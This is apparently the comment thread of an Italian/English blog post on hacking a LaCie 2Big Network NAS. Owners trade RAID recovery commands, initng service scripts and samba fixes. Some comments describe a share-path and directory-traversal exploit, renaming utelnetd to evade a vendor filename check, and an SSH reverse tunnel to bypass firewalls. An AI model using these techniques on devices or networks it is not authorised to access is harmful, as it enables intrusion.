130 pensieri su “LaCie 2Big Network hack: telnet, openssh, ntpd, cups and more..”

1. I just wanted to say thanks for this, as on 2big Network II (the new boxes) some of the older tricks don’t work (the cgi exploit to begin with!).

   in my case I had to an old box (v1) that collapsed, leaving the drives inaccessible.

   that involved getting a new box, copying four of the partitions from one of the new drives to one of the old ones, adding in your telnet hack, booting from the old drive, and hacking in.

   very, very elegant.

   i’ll leave this for reference, in case anyone else needs to rescue their data:

   the OS is multiple RAID 1 partitions (presumably so you can hot-swap the drives), and the user data is a Linear, RAID 0, or RAID 1 array from /dev/sda2 and /dev/sdb2, with UUID stored in EEPROM on the board. the user data is assembled at /dev/md4 and mounted at /home

   the partitions: 2=data, 5=swap, 7=boot, 8=root, 9=snap (config)
   the raid arrays: /md0=boot, /md1=root, /md2=snap, /md3=swap, /md4=data

   to get the UUID of the RAID you want to “plant” back:
   mdadm --examine /dev/sda2

   to get the UUID stored in EEPROM
   /sbin/md_eeprog -g /dev/md4

   to set the UUID to new one
   /sbin/md_eeprog -s {UUID} /dev/md4

   for other research for system surgery look in: sbin/lib/lacie/libraid

   I don’t know what LaCie’s engineers were thinking… they’ve missed a really important design feature – being able to pull the drives and use them in another box without fuss.

2. p.s. to clarify, the user data raid (/dev/md4) is constructed automatically based on UUID:

   mdadm --assemble /dev/md4 -u {uuid_from_eeprom}

   so drives could be in any order, etc.

3. Thank you George for your intervention, any new information on the NAS is helpful for future hack.
   In these days i’m busy with the study… computer networking and database leaves little time even to social life!

   I don’t know what LaCie’s engineers were thinking… they’ve missed a really important design feature – being able to pull the drives and use them in another box without fuss.

   I think it’s simply a matter of money, because when a hd is broken you have to buy it from LaCie (or at least they wish it to be so).
   😉

4. Grazie per questo utile articolo. Proverò nei prossimi giorni a metterci su git. Tu hai qualche suggerimento?

   Ciao, ancora una cosa, forse sto sbagliando ma non riesco a capire come accedere con il browser alle cartelle condivise…

5. Hai eseguito i passaggi descritti nel paragrafo “hacking tramite la creazione di una nuova condivisione” ?
   Spiega meglio in quale passaggio non ti trovi e cercherò di darti maggiore aiuto.
   Te li ripropongo numerati:

   1) Create una nuova condivisione sul vostro nas di nome “Hack”. La path della condivisione non è importante ciò che importa è che abilitiate almeno la condivisione http.
   2) Salvare la configurazione xml del vostro nas sul disco (Sistema->Manutenzione->Salva configurazione)
   3) Fare una copia di backup del file appena salvato (Fatelo! Vi servirà più avanti per rimettere le cose in ordine).
   4) Editare il file di configurazione xml scaricato modificando la path della condivisione “Hack” come da figura:
   (vedi la linea rossa della figura)
   5) Salvare le modifiche e uppare la nuova configurazione sul nas (Sistema->Manutenzione->Carica la configurazione)
   6) Usate il vostro browser e accedete alle pagina di amministrazione del nas e cliccate su sfoglia per navigare sulla nuova condivisione via web.

   Con la versione del firmware 2.2.3 l’hack funziona egregiamente e che io sappia non sono uscite nuove versioni del firmware che correggono questo exploit. Anche se george dice, nel suo commento, che nella nuova versione del nas alcuni exploit non funzionano più:

   … as on 2big Network II (the new boxes) some of the older tricks don’t work (the cgi exploit to begin with!).

   Ad ogni modo ricorda che c’è sempre l’altra opzione, quella di estrarre gli hd del nas e inserirli nel proprio pc con linux e mdadm installato e inserire i file degli archivi a mano.
   Il comando mdadm --assemble --scan assemblerà le partizioni raid in automatico.
   La partizione che ti interessa dove mettere i file è quella da 648Mb circa. Però presta molta attenzione a quello che fai se commetti errori ti trovi con una scatola inutile in mano…

6. Ciao,

   mi spiego meglio.
   Ho fatto tutti i passaggi e riesco tranquillamente ad accedere come root tramite telnet. Ottimo!
   Ho scaricato il pacchetto git e l’ho installato e funziona senza problemi dando i comandi direttamente sull’hd.
   I problemi nascono con i servizi. Non riesco a configurare initng. Nel dettaglio, git per funzionare come servizio vuole in esecuzione git-daemon. Se lo lancio manualmente non come servizio funziona. Quindi ho creato un file che si chiama git.i in /etc/initng con il seguente contenuto:

   #!/sbin/itype

   daemon git {
need = bootmisc virtual/net samba/smbd;
require_network;
exec daemon = /usr/bin/git-daemon --export-all;
}

   il servizio non parte in automatico... se cerco di farlo partire a mano con il comando:

   ngstart /etc/initng/git.i mi dice di eseguire ngc -z ...

   lo faccio e dice Command NEGATIVE

   poi edito il file git.i cambio il nome del servizio e con lo stesso comando di prima parte.... ma al boot non parte mai.
   Non trovo documentazione chiara su initng, puoi aiutarmi con questo file?

   PS i link in qusta pagina di personal.i e personal2.i non funzionano.

   Grazie.

   Steppenwolf edit: ho modificato il tuo commento apportando la tua correzione allo script di avvio di git.

7. per avviare un servizio in automatico con initng devi aggiungerlo
   alla lista dei servizi che si trova nella cartella /etc/initng/runlevel/, file default.runlevel

   Quindi nel tuo caso:

   cd /etc/initng/runlevel/
echo git >> default.runlevel

   Spero di averti dato le indicazioni che cercavi. Fammi sapere.

   Ti ringrazio per avermi informato dei link, era un problema noto di wordpress, spero di aver risolto una volta per tutte. 🙂

8. si, avevo fatto questi passi, ma non funzionava. Praticamente avevo commesso un errore e cioè i servizi si chiamavano in modo differente. nel file git.i avevo messo git-daemon mentre in default.runlevel solo git.

   Per ora è tutto, adesso devo provare ssh. Ti faccio sapere. Il server git funziona bene!

9. Ottimo. Scusa se non ti sono stato troppo di aiuto ma al momento non ho il nas sottomano quindi vado a memoria 😛
   In tutta sincerità mi era sfuggito il tuo errore. Di documentazione chiara su initng non ne ho trovata neanche io, il software non è mai stato rilasciato in una versione stabile, di fatto è una beta. Viene da chiedersi perché LaCie ha adottato initng..

   Ci sono un po di file di configurazione dei servizi per initng a questo indirizzo:
   nohttp://dieter-ferdinand.homelinux.org/
   una volta aperto il link clicca su “Download Scripte und Programmquellcode und Konfigurationsdateien”
   poi su “etc” e infine su “initng”. Non ti do il link già pronto perché è inutile: il sito internet di questa persona blocca l’hot-linking, quindi il tuo browser non caricherebbe la pagina.
   Attenzione che quei file possono servire come guida di riferimento ma sul nas la configurazione è diversa quindi non ci devi fare troppo affidamento. Ad ogni modo non ci trovi un file di configurazione per git (ci ho dato un occhiata subito).
   Aggiornamento: Il tipo ha tolto tutto dal suo sito. (!!)

   Per farti un idea delle diversità guarda il file di configurazione per sshd standard e il mio. Es:

   Standard daemon daemon/sshd { ...
   Mio daemon sshd {...
   Il daemon in grassetto indica la cartella dove è contenuto il file sshd.i (/etc/initng/daemon/), nel nas la cartella daemon non esiste, tutti di file di configurazione dei servizi e demoni di sistema, servizi di rete e servizi non essenziali sono tutti inseriti nella stessa cartella (/etc/initng/).
   Senza documentazione questa cosa l’ho capita a tentativi.

   Tieni sempre sott’occhio quanta ram usa il nas, rallenta parecchio quando finisce (tipo quando lo usi per scaricare un torrent).
   Una domanda, per curiosità, come mai git e non subversion?
   Ti premetto che non conosco git, mentre so che è un po rognoso configurare svn con lighttpd.
   Se hai problemi con ssh fai un fischio 🙂

10. Ti ringrazio molto per il tuo aiuto. Poi ho installato e configurato correttamente ssh grazie.
    Guarderò la ram, anche se alla fine userò solo git e ssh. Hai qualche altro pacchetto da suggerirmi?
    Io sono approdato a git direttamente da cvs senza fare il passaggio a svn che quindi non conosco. Ma cvs era un bagno di sangue… molte limitazioni, dal rinominare un file ad esempio al dover lavorare disconnesso.
    Git ha di buono, non credo svn, che con il clone tu copi in locale sulla tua macchina tutto l’archivio e quindi puoi fare confronti tra file di vecchie versioni senza connetterti al server, che per una persona che lavora spesso in trasferta e su impianti è una grande comodità.
    Sto rivalutando la Lacie che con questa modifica fatta al disco, ho molti loro prodotti, ma ultimamente ero un po’ deluso: non portano avanti il software, frequanti guasti per esempio l’alimentatore del mio edmin V2 e la rottura del circuito di un hd esterno fortunatamente l’alimentatore era quello che serviva all’edmin e alla fine da due ne ho fatto uno…
    L’utilità di avere due dischi in mirroring non è dapoco, concentrando sempre di più i dati verso un’unica unità per questo apprezzo questo disco e ora che ci sono su in ssh… 🙂

11. Scusami se ti rispondo solo ora ma ero in viaggio di ritorno…
    Ti consiglio, se ti può interessare, di installare il demone ntp così il nas si aggiorna l’orario da solo e la smette di dire che il tuo orario non è sincronizzato con il suo (in ssh la cosa è pesante perché non ti fa fare il login).
    Un altro servizio che vorrei aggiungere, tempo permettendo, è nfs (lato server), ma bisogna compilare un modulo del kernel per farlo lavorare correttamente e al momento sono sotto esami, quindi appena ho tempo penso che mi ci metto su, anche se non sono un mago del cross-compiling.
    Ciao. 🙂

12. ciao e grazie delle info.
    Ho un problema col client torrent di questa macchina, che non va e non riesco a debuggare. Mi sai consigliare una package alternativo per ARM, possibilmente con UI web?

    Altra domanda: il NAS risiede su rete nattata (fastweb) ma vorrei usare uno dei servizi (es. ftp) per sincronizzare file da remoto (internet). Ho visto LogMeIn ma non mi pare ci sia una versione compilata per ARM. Hai qualche idea?

    Grazie in anticipo

13. Dunque.. Non so bene che problemi hai con llibtorrent del nas.. ad ogni modo se ti devo consigliare un software alternativo direi decisamente transmission.
    La stessa LaCie in un modello nuovo di hard disk di rete lo ha adottato. Tutto il programma consta di tre file eseguibili, uno script di avvio e il resto sono pagine web, manuali per man e documentazione in 571Kb (compressi).
    Eccoti il link per il binario compilato per arm http://downloads.buffalo.nas-central.org/LSPro_ARM9/Distributions/Genlink/Binaries/armv5tejl-softfloat-linux-gnueabi/transmission-1.33.tbz2
    Dall’archivio non ti servono ne la cartella /usr/share/man, ne la cartella /usr/share/doc, ne la cartella /etc/init.d, in particolare l’ultima è da rimuovere assolutamente.
    Ho buttato giù quattro righe di codice per un possibile script di avvio initng per transmission:

    cd /etc/initng
vi transmission.i

    #!/sbin/itype

    daemon transmission {
need = bootmisc virtual/net;
require_network;
exec daemon = /usr/bin/transmission-daemon;
}

    cd runlevel
echo transmission >> default.runlevel

    Aggiornamento: Non l’ho testato. Testato. Attualmente questo script NON funziona del tutto bene: Il demone “transmission-daemon” viene avviato correttamente, ma se si manda il comando ngc -s il demone risulta essere “DAEMON_STOPPED” anche se in realtà funziona senza problemi.

    Transmission risponde alla pagina web http://indirizzo_web_nas:9091.
    Attualmente ho installato e avviato (manualmente) transmission sul mio nas e devo dire che, una volta configurato, si sta comportando molto bene.

    Non ho intenzione di installare transmission sul mio nas, anche se sono sicuro che funzioni meglio di libtorrent, non per denigrare libtorrent che viene usato dai maggiori programmi per scaricare torrent (http://www.rasterbar.com/products/libtorrent/projects.html) ma la gestione del programma implementata dalla LaCie è decisamente limitata (a cominciare proprio dalla gestione delle porte).

    Per quanto riguarda la possibilità di aggirare il nat della rete fastweb non mi viene in mente nulla di buono. Conosco bene LogMeIn, (alias Hamachi) essendo un programma commerciale non rilasciano il codice sorgente dunque non è possibile nemmeno compilarlo per altre piattaforme. Ne conosco versioni open-source che fanno la stessa cosa di hamachi. Sorry!

    Spero di esserti stato di aiuto. Fammi sapere con transmission se hai avuto problemi.

    Aggiornamento: http://trac.transmissionbt.com/wiki/WebInterface

14. Il client torrent semplicemente ha smesso di scaricare senza errore apparente (e non ho capito come mettere il syslog a debug). Non credo sia un problema di rete perchè un paio di altri sw torrent sul pc invece lavorano senza problemi e senza particolari riconfigurazioni di port fwd del mio router/fw.
    Ho provato anche a settare manualmente le configurazioni di up/download rate consigliate da utorrent, ma senza successo.
    Tra l’altro dal syslog (System>Status>system log) vedo continui restart del servizio http (ogni minuto: al supporto mi hanno confermato essere un bug della distribuzione corrente)
    Cmq grazie, ti terrò informato.

15. Ciao, ero indeciso sul client ntp, ma ora che mi dici questo lo installerò sicuramente.
    Stavo provando ad installare ddclient e l’ho messo però non funziona perchè mi chiede perl… sono indeciso, non vorrei fare troppi casini visto che ora inizia a funzionicchiare… che mi consigli?
    Ah poi un’altra cosa stranissima che non mi spiego, è anche comica… ad un certo punto il client torrent ha iniziato ad inviarmi le mail di fine download al mio indirizzo mail… ma io non ricordo di aver impostato il mio indirizzo da nessuna parte e poi queste mail a volte partono e a volte no…

16. Ciao a tutti, vi chiedo un informazione. Non sono molto pratico di Linux ma questa guida è molto ben fatta complimenti. Ecco il quesito: ho un lacie ED mini V2, è possibile installare il servizio CUPS e client torrent su questa unità?
    E’ possibile utilizzare le procedure descritte per aggiungere telnet, ssh, cups ad un lacie EDmini V2?
    Grazie per una risposta.

17. @Gabriele
    In merito a libtorrent. Eccoti due porte che vengono aperte dal programma e che non sono modificabili dall’interfaccia amministrativa del nas:
    netstat -l
....
udp 0 0 0.0.0.0:4445 0.0.0.0:*
udp 0 0 0.0.0.0:6881 0.0.0.0:*
...
    Forse può essere di aiuto aprirle..

    In più è possibile modificare la pagina web /www/download.html e il file /www/javascripts/download.js al fine di settare il livello di log degli eventi del torrent (“Livello min. avvisi”). La modifica è semplice perché il codice utile è già presente nei file originali, bisogna solo de-commentare alcune righe.
    L’unica cosa sgradevole è che il livello di avvisi si deve settare a mano ogni volta che si riavvia il client torrent. I livelli di info sono: Fatal, Critical, Warning, Info, Debug e None.
    __________________________________

    @Massimiliano
    Non so che dirti per il perl ricordati che è sempre un sistema embedded con poca cpu e poca memoria… Stai sempre attento a non sovrascrivere librerie e/o file già presenti.

    Ah poi un’altra cosa stranissima che non mi spiego, è anche comica… ad un certo punto il client torrent ha iniziato ad inviarmi le mail di fine download al mio indirizzo mail… ma io non ricordo di aver impostato il mio indirizzo da nessuna parte e poi queste mail a volte partono e a volte no…

    Quanto ci scommettiamo che invece la mail l’hai inserita? Magari quando hai modificato il file di configurazione xml del nas? Fai un rapido controllo nella pagina amministrativa del nas clicca su utenti e poi su admin e vedrai che nel “Profilo utente Admin” nel campo “Indirizzo e-mail (necessario per gli avvisi e-mail)” comparirà la tua mail.
    Il motivo delle mail che a volte arrivano e a volte no è a causa di google mail che cestina le mail che arrivano da indirizzi non conosciuti o quando arrivano troppe mail contemporaneamente da uno stesso indirizzo ip (politica antispam). Controlla la cartella /var/mail del nas nella sotto-cartella msglog troverai tutte le mail che google ha rispedito al mittente 😀 (Our system has detected an unusual amount of unsolicited mail originating from your IP address… ecc.)
    __________________________________

    @Alessio
    Penso proprio di si dato che mi sono basato sulle guide sul tuo modello per bucare il mio nas. Eccoti un po di link utili:
    http://psykocybernetik.com/blog/?q=content/add-ssh-lacie-edmini-v2;
    poi c’è questo link qui (anche qui parlano esplicitamente del demone ssh) http://www.rigacci.org/wiki/doku.php/doc/appunti/hardware/lacie_d2_network e infine darei un occhiata a questo forum http://forum.nas-central.org/viewforum.php?f=146&sid=2f2ab742f4d6e836734fe67dcc1dd07e
    L’unica restrizione per il cups è la presenza del modulo del kernel usblp. Una volta che l’hai la shell per testare l’esistenza del modulo basta che scrivi modprobe usblp.
    Per il resto il processore è sempre un arm, la versione del kernel è la stessa, quindi è possibile che sia lo stessa anche la versione del firmware. Per quello che ho visto in giro sembra che ssh sia già presente nel edmini-v2, quindi meno lavoro da fare. L’hack eseguito per aggiungere telnet è stato adottato anche dal tipo che ha scritto la guida che ti ho suggerito con il secondo link.. Il resto sta a te fare le prove che servono, io quel modello non lo possiedo e non posso esserti di aiuto più di tanto.

18. ciao
    grazie al tuo telnet e alle info sul debug di libtorrent ho capito che avevo sbagliato la configurazione del dns sul nas (non risolveva l’host dell’announce). Il torrent ancora non va ma almeno sono un passo avanti. Ci lavorero un po nel weekend.
    Intanto grazie

19. Ciao Steppenwolf,
    ti ringrazio della guida, molto chiara e ben fatta.
    Sono molto lontano dai tuoi livelli, ma trovo il coraggio di domandarti una cosa… 🙂
    Abbiamo questo NAS da utilizzare per condividere file in una rete Windows, Samba però non è configurato (come a noi interessa) per gestire gli attributi DOS dei file in sola lettura.
    Dalla documentazione leggo che va settato il `map read only’ ed eventualmente lo `store dos attributes’.
    Con l’hack descritto ho letto il file `samba.conf’ in \etc\samba\, l’ho modificato aggiungendo la riga `map read only = permissions’, l’ho ricaricato, ma ad ogni riavvio o modifica della configurazione samba dall’interfaccia web, quest’ultima si perde… 🙁
    Puoi darmi qualche dritta sul file in cui la devo inserire o quale documentazione è meglio che legga? Ti ringrazio — Luca

20. Se hai avuto modo di vedere la parte dell’articolo riguardante la preservazione dei diritti dell’utente e in particolare il servizio personal.i allora hai un idea di come procedere per mantenere le tue configurazioni personali.
    Dunque se vuoi aggiungere delle righe in fondo ad un file:
    cat /etc/samba/mysmb.conf >> /etc/samba/smb.conf

    Altrimenti se vuoi sovrascrivere l’intero file:
    cat /etc/samba/mysmb.conf > /etc/samba/smb.conf

    Se, altrimenti, vuoi cambiare una singola riga preesistente:
    PRINTING=" printing = cups"
LINE="`cat /etc/samba/smb.conf | grep printing`"
sed -i "s#${LINE}#${PRINTING}#g" /etc/samba/smb.conf

    Aggiungi le righe che ti interessano alla fine del file personal.i, mentre il file “/etc/samba/mysmb.conf” è un file personale che ti puoi creare tu inserendo le configurazioni del samba che ti interessano.
    Per finire dei riavviare il servizio samba: “ngc -r samba“. Tieni conto che è bash quindi una volta che sei dentro la sezione “script start” puoi scrivere tutte le righe bash che preferisci. Scusami se non ti sono di aiuto più di così ma sono davvero incasinato con gli studi al momento. Fammi sapere. 🙂

21. Invece mi sei stato di grande aiuto, almeno adesso so cosa devo cercare e leggermi 😀
    In bocca al lupo per i tuoi esami…
    Ti ringrazio (e se riesco a combinare qualcosa ti faccio sapere) — Luca

22. Ciao Steppenwolf, anzitutto grazie per la guida, ottima anche se si vuol cambiare (come nel mio caso) il filesystem del disco esposto /dev/md4.
    L’unica cosa che non mi torna del tuo sshd.i per la generazione delle chiavi ssh è il fatto che richieda il comando script che, nel mio caso, non ho.
    script dovrebbe essere nel pacchetto bsdutils, però non lo trovo qui http://downloads.buffalo.nas-central.org/LSPro_ARM9/Distributions/Genlink/Binaries/armv5tejl-softfloat-linux-gnueabi/.

    Hai una dritta da darmi?

    Ciao e complimenti ancora.

23. Ok, trovato. Il pacchetto è http://downloads.buffalo.nas-central.org/LSPro_ARM9/Distributions/Genlink/Binaries/armv5tejl-softfloat-linux-gnueabi/util-linux-2.13.1.1.tbz2

    Ora ho rebootato ma è da almeno 10 minuti lampeggiante ed inaccessibile. Come sono stati per te i tempi di reboot dopo l’installazione di ssh?

    Ciao!

24. Mi spiace solo non aver letto i tuoi commenti prima, così da poterti fermare! Va bhe.. ora il danno è fatto.
    Il comando “script” è insito in initng e viene letto e compreso dal suo parser. Non vi era alcuna ragione di cercare alcun pacchetto aggiuntivo.

    Ho dato un occhiata al pacchetto che hai installato, ha sovrascritto molti eseguibili di sistema.. (Nel sostituire un file con una nuova versione può facilmente saltare la configurazione del nas, per molteplici motivi, librerie richieste non risolte, mancanza di compatibilità tra un eseguibile ed un altro. ecc.)

    Adesso ti rimangono due possibilità.
    La prima, la più semplice, aggiornare il firmware del nas, con l’utility ufficiale della LaCie. (Questo se l’utility è in grado di vedere il nas e qui sono molto scettico.) L’aggiornamento del firmware riporta il nas alla caratteristiche di fabbrica, l’unica cosa che si deve fare è ricreare le condivisione presenti sul nas con lo stesso nome; i dati non vengono perduti.

    La seconda possibilità.
    Avrai bisogno di un pc con linux installato, due connessioni sata libere, e tanta pazienza.
    La buona notizia è che i file che hai sovrascritto in realtà non li hai sovrascritti! 😀
    Infatti sul nas c’è una partizione di circa 640Mb che viene sovrapposta ad una più piccola dove vi è il s.o. effettivo del nas. Quando da shell telnet si spacchettano nuovi file, (come nella mia guida), o si modificano file già esistenti, il nas in realtà non modifica il filesystem del sistema operativo ma la partizione sovrapposta (overlay).

    Andiamo alla parte pratica.
    Devi staccare gli hd del nas e montarli nel tuo pc fisso (tutti e due !!),
    Avere linux installato o usare un live cd di ubuntu
    Installare mdadm se non è già presente nel tuo sistema linux (nel live cd non è presente) dall’utility gestione pacchetti.
    Aprire una console di root e lanciate il comando:
    mdadm --assemble --scan
    Le partizioni raid dei tuoi hd del tuo nas saranno riconosciute istantaneamente.
    Gli hd non sono effettivamente montati, per farlo bisogna cliccare sulle icone degli hd, altrimenti da riga di comando.
    Per accedere alle informazioni presenti negli hd bisognerà avere i diritti di root, quindi dalla console di root devi eseguire il comando:
    nautilus &
    Devi cercare la partizione di circa 640Mb (/dev/md2) e dentro di questa troverai una cartella, snap/00/. Li ci sono tutti i file che hai modificato e installato nel tuo nas.
    Qui viene la parte delicata. Devi cancellare ogni singolo file presente nell’archivio che hai scaricato. La parte delicata consiste nell’individuare con correttezza questi file (compara l’archivio con i file presenti nella tua partizione), e sopratutto individuare correttamente la partizione da 640Mb.
    Se cancelli un file del firmware originale, non hai modo di tornare indietro.
    Una volta eseguiti questi passaggi, arresta la macchina, monta nuovamente gli hd nel nas e avvialo (incrociando le dita).
    Questa procedura l’ho eseguita anche io quando in uno dei miei tentativi di installare alcune applicazioni ho sovrascritto due librerie preesistenti nel nas e mi è andata bene perché il nas è tornato a funzionare correttamente.
    Non cancellare nessuna cartella e non cancellare nessun file che non corrisponde all’archivio che hai scaricato (util-linux-2.13.1.1.tbz2). Ok?!
    In bocca al lupo! 🙂

    Un consiglio generale, prima di installare nuovi pacchetti software sul nas, controllate il loro contenuto con i file presenti sul nas stesso, se ci sono file che sovrascrivono file già presenti sul nal eliminateli dall’archivio in vostro possesso.
    Ho messo a vostra disposizione, su questa guida, il mio archivio proprio per evitare che succedessero cose del genere.
    E in generale andateci con i piedi di piombo quando installate nuovo software sulla vostra macchina.
    Un altra cosa.. hai installato tutti i file presenti in quell’archivio che hai scaricato? Solo per farmi un idea di quello che hai fatto, non per altro.

25. Ciao Steppenwolf,
    sì ho fatto tutto quanto hai sospettato e sì, ho introiato tutto 😀

    Tu hai scritto “Il comando “script” è insito in initng e viene letto e compreso dal suo parser. Non vi era alcuna ragione di cercare alcun pacchetto aggiuntivo.”, ma sshd.i non andava, anche lanciando con strace il messaggio era che no trovava script.

    Nessun problema comunque, mi sono già messo al lavoro con l’ambiente rescue di Debian Lenny che ha tutti i requisiti che dici tu. Però non mi è chiara la funzione della snap/00. E’ quanto sta girando attualmente sul sistema o no? Visto che non ho alcun dato sensibile, non posso brasare totalmente la parte del sistema operativo e ripartire da zero? Non esiste sul dispositivo una sorta di tar contenente il sistema base da mettere nella partizione di avvio?

    Grazie per il supporto e non ti preoccupare: il bello di hackerare è capire 😉

26. Ok, tutto a posto, ho risolto.
    Ho collegato un solo disco SATA al sistema rescue di una debian, ho lavorato su /dev/md2 rimuovendo i file installati da quel pacchetto. Ho quindi capito che la directory snaps/00 è una sorta di override del sistema principale: se il sistema trova quei file li usa, siano essi di sistema (tipo mount, che io avevo sovrascritto) o no.
    Ho ricollegato il disco SINGOLARMENTE sul LACIE, quindi senza il secondario, ed il sistema si è avviato. Ho spento di nuovo, collegato l’altro disco ed ora si sta ricostruendo.

    Grazie ancora per il preziosissimo aiuto.

    P.S. per tutti: Samba per qualche arcana ragione eroga gli share con l’opzione “unix extensions = no” che limita notevolmente il mount CIFS su Linux, modificando il parametro a yes o rimuovendolo (visto che yes è il default), a Linux il filesystem piace di più (ad esempio è possibile creare file con il carattere “:”, come si da il caso che faccia rdiff-backup che sto usando).

27. Contento che hai risolto il problema! 🙂 Scusami se ti rispondo solo ora ma sono sotto esami…
    Non ho ben capito perché hai collegato un solo disco e poi anche il secondo. Ogni volta che ho dovuto accedere ai dischi del mio nas tramite il fisso non ho avuto mai il bisogno di ricostruire l’array raid.

    Ho quindi capito che la directory snaps/00 è una sorta di override del sistema principale: se il sistema trova quei file li usa, siano essi di sistema (tipo mount, che io avevo sovrascritto) o no.

    Si è esatto, ed era quello che cercavo di spiegarti nel mio commento. Più che override parlerei di overlay (sovrapposizione).
    Per maggiori informazioni a riguardo vedi: http://it.wikipedia.org/wiki/UnionFS

    il bello di hackerare è capire

    Assolutamente vero, spiegare come si fa una cosa, senza spiegarne il perché non è di aiuto a nessuno..

    Se hai bisogno di una mano…. 😉
    Ciao.

28. @steppenwolf: guida meravigliosa. Provato sul big5 network2 e funziona perfettamente

    @gabriele: per quanto riguarda l’accesso ftp quando il nas e’ nattatopuoi usare questo semplice metodo di hacking:

    – dal nas fai un collegamento ssh verso un server esterno (il server in realta’ e’ il pc con cui vuoi effettuare la sincronizzazione)
    – siccome il pc cambiera’ probabilmente il suo indirizzo ip (a meno che non abbia sempre lo stesso indirizzo ip pubblico) puoi usare anziche’ l’ip dello stesso il nome del pc su dyndns
    – con ssh fai un reverse tunnel che mappi la porta ftp del client verso la porta ftp del tuo nas

    Sicuramente se non hai mai fatto queste cose non ti sara’ tutto chiaro, in ogni modo e’ una variante del firewall piercing (per bypassare le regole dei firewall)

    Chiedi se hai bisogno di chiarimenti

    Dirac

29. Provata anche la 2.2.6. Funziona sia l’exploit del directory traversal (../../../../)

    che il telnet, con un piccolo accorgimento pero’ visto che evidentemente hanno inserito un pattern maching sul nome utelnetd e forse anche su telnet.cgi

30. Non so che dirti.. Ho provato l’hack sul nuovo firmware prima di risponderti.
    Mi ero già chiesto se funzionasse, ma non ho badato troppo al nas in questi ultimi giorni..
    Come nel nuovo post che ho scritto oggi, non ho avuto problemi a applicare l’hack sul nas. A questo punto mi chiedo che tipo di difficoltà hai avuto tu..
    Ad ogni modo è vero anche che i modelli sono leggermente diversi (a livello firmware intendo).
    Fammi sapere… e grazie dei complimenti. 😛

31. Niente di particolare, solo che se provi ad uploadare utelnetd non te lo fa fare; allora gli ho cambiato nome e l’ho chiamato ucontattad e funziona tutto alla perfezione…

    probabilmente hanno messo un controllo che rende impossibile fare l’upload di un file di nome utelnetd, magari alla Lacie hanno letto il tuo post e hanno adottato le contromisure (mah!)

    Dirac

32. Ciao, ho il 2big e sfortunatamente da un momento all’altro non riesco più ad accederei ai dati, di seguito il log con l’errore.
    Mi chiedevo se in qualche modo posso sperare di recuperare i dati, mi può essere utile la tua guida? Grazie.

    Apr 16 17:30:12 (none) user.notice kernel: Filesystem “md4”: Disabling barriers, not supported by the underlying device
    Apr 16 17:30:12 (none) user.notice kernel: XFS mounting filesystem md4
    Apr 16 17:30:12 (none) user.notice kernel: Starting XFS recovery on filesystem: md4 (logdev: internal)
    Apr 16 17:30:12 (none) user.alert kernel: Filesystem “md4”: xfs_inode_recover: Bad inode magic number, dino ptr = 0xc4e25500, dino bp = 0xc4cc8ec0, ino = 2957754997
    Apr 16 17:30:12 (none) user.alert kernel: Filesystem “md4”: XFS internal error xlog_recover_do_inode_trans(1) at line 2310 of file fs/xfs/xfs_log_recover.c. Caller 0xbf05480c
    Apr 16 17:30:12 (none) user.warn kernel: [] (dump_stack+0x0/0x14) from [] (xfs_error_report+0x54/0x64 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_error_report+0x0/0x64 [xfs]) from [] (xlog_recover_do_inode_trans+0x2bc/0x8fc [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_recover_do_inode_trans+0x0/0x8fc [xfs]) from [] (xlog_recover_do_trans+0x7c/0x158 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_recover_do_trans+0x0/0x158 [xfs]) from [] (xlog_recover_commit_trans+0x3c/0x54 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_recover_commit_trans+0x0/0x54 [xfs]) from [] (xlog_recover_process_data+0x188/0x234 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: r7:c4e40370 r6:38490200 r5:2a010000 r4:0000012a
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_recover_process_data+0x0/0x234 [xfs]) from [] (xlog_do_recovery_pass+0x2e8/0x868 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_do_recovery_pass+0x0/0x868 [xfs]) from [] (xlog_do_log_recovery+0x78/0x9c [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_do_log_recovery+0x0/0x9c [xfs]) from [] (xlog_do_recover+0x20/0x138 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: r9:00000000 r8:00000000 r7:c5bba000 r6:c59d6e80 r5:00000000
    Apr 16 17:30:12 (none) user.warn kernel: r4:00024928
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_do_recover+0x0/0x138 [xfs]) from [] (xlog_recover+0x9c/0xbc [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: r7:c5bba000 r6:c59d6e80 r5:00000000 r4:00024928
    Apr 16 17:30:12 (none) user.warn kernel: [] (xlog_recover+0x0/0xbc [xfs]) from [] (xfs_log_mount+0xb0/0x114 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: r6:00000000 r5:c7c3d2c0 r4:00000000
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_log_mount+0x0/0x114 [xfs]) from [] (xfs_mountfs+0x7c8/0xac0 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_mountfs+0x0/0xac0 [xfs]) from [] (xfs_ioinit+0x38/0x3c [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_ioinit+0x0/0x3c [xfs]) from [] (xfs_mount+0x32c/0x3c4 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: r5:c5bba000 r4:00000000
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_mount+0x0/0x3c4 [xfs]) from [] (vfs_mount+0x28/0x2c [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (vfs_mount+0x0/0x2c [xfs]) from [] (xfs_fs_fill_super+0x8c/0x1d4 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_fs_fill_super+0x0/0x1d4 [xfs]) from [] (get_sb_bdev+0x12c/0x184)
    Apr 16 17:30:12 (none) user.warn kernel: r8:00008000 r7:c6f92da0 r6:c59f7a00 r5:c59f7a00 r4:c6f92db8
    Apr 16 17:30:12 (none) user.warn kernel: [] (get_sb_bdev+0x0/0x184) from [] (xfs_fs_get_sb+0x24/0x30 [xfs])
    Apr 16 17:30:12 (none) user.warn kernel: [] (xfs_fs_get_sb+0x0/0x30 [xfs]) from [] (vfs_kern_mount+0x58/0x94)
